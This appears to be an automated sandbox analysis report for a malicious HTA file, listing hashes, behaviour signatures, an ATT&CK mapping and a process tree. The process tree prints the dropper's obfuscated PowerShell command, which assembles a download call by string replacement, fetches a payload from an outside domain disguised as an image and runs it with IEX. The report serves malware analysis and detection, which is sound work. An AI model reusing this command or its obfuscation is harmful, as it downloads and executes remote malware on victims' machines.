Overview

overview

10

Static

static

0eaee4c07e...41.hta

windows7_x64

10

0eaee4c07e...41.hta

windows10-2004_x64

10

Analysis

  • max time kernel
    44s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    06-07-2022 02:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0eaee4c07ea1b88a8e5d044006b42d41.hta

  • Size

    1KB

  • MD5

    0eaee4c07ea1b88a8e5d044006b42d41

  • SHA1

    62fe6a825728c186335fc2a24f24f0608519cdff

  • SHA256

    2693749e9e3f7c99543e3e622a335a9db30dc604808f06e3a51f20c33bac8af2

  • SHA512

    61ea582878866c4a5ac0cff1cfa4a8e59731396a25df430382bee11eedd4c0d942c81fc8c0d375027f45106e1dcff14910ce63e9a2c5b85451b0bd68e7a1311f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://unimed-corporated.com/updata.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0eaee4c07ea1b88a8e5d044006b42d41.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1336
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://un').Replace('################','imed-corporated.com/updata.jpg'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:820

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/820-54-0x0000000000000000-mapping.dmp
    Download
  • memory/820-55-0x0000000074B51000-0x0000000074B53000-memory.dmp
    Filesize

    8KB

    Download
  • memory/820-56-0x0000000071AD0000-0x000000007207B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/820-57-0x0000000071AD0000-0x000000007207B000-memory.dmp
    Filesize

    5.7MB

    Download